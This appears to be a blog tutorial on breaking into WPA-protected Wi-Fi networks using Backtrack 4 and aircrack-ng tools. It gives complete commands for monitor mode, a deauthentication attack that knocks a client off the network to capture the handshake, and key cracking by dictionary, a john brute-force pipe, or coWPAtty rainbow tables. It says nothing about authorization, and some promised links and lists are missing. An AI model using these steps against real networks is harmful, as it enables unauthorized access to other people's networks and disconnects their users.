For this attack, we are going to need two things, Backtrack 4 Beta and a wpa encrypted network. Additional tools that are not required but could impove the attack are WPA rainbow tables for the top 1000 SSID’s which will be hosted here shortly.

To begin, we must throw our wireless card into monitor mode. To do so, we open a shell and either type airmon-ng start wifi0 for atheros cards or iwconfig wlan0 mode monitor  for intel cards. Then we need to determine what network we wish to attack by typing airodump-ng -i ath0 to find the network. Once found, we stop the scan by hitting Ctrl+C . Afterwards, we then type airodump-ng -c # -bssid XX:XX:XX:XX:XX:XX -i ath1 –showack -w capture where:

  • # = channel numbere
  • XX:XX:XX:XX:XX:XX = bssid or mac address of router

This command will create a capture file for the wpa handshake which what we crack to gain the wpa key. In order to gain the handshake we must deauthenticate a user connected to the network. To do so, we open another shell, type aireplay-ng -0 0 -a XX:XX:XX:XX:XX:XX -c YY:YY:YY:YY:YY:YY ath1

where YY:YY:YY:YY:YY:YY is the mac address of a client connected to the target network, listed on the airodump shell. Let the aireplay shell run until you have a handshake captured in airodump. To check that you have a complete handshake, open a third shell, type aircrack-ng capture-01.cap to see if the target network as (1 handshake)

Now that you have a captured handshake, you have multiple options for cracking:

  • Aircrack-ng with a password file
  • CoWPAtty if you have a rainbow table
  • Online Cracking Site ($$)

For aircrack, load shell, type aircrack-ng capture-01.cap -w dictionary.txt

The two dictionary files used for the hases are:

To brute force the capture file using aircrack and john, type ./john –stdout –incremental:all | aircrack-ng -e ssid -w – capture_file

For cowpatty, load shell, type cd /pentest/wireless/cowpatty/ then ./cowpatty -r /root/capture-01.cap -s [ssid] -d [hashfile] where [ssid] is the network to crack and [hashfile] is the rainbow table for the network .

Just remember, if time is of the essence, then use cowpatty if possible.


The WPA hashes have been uploaded, and can be found here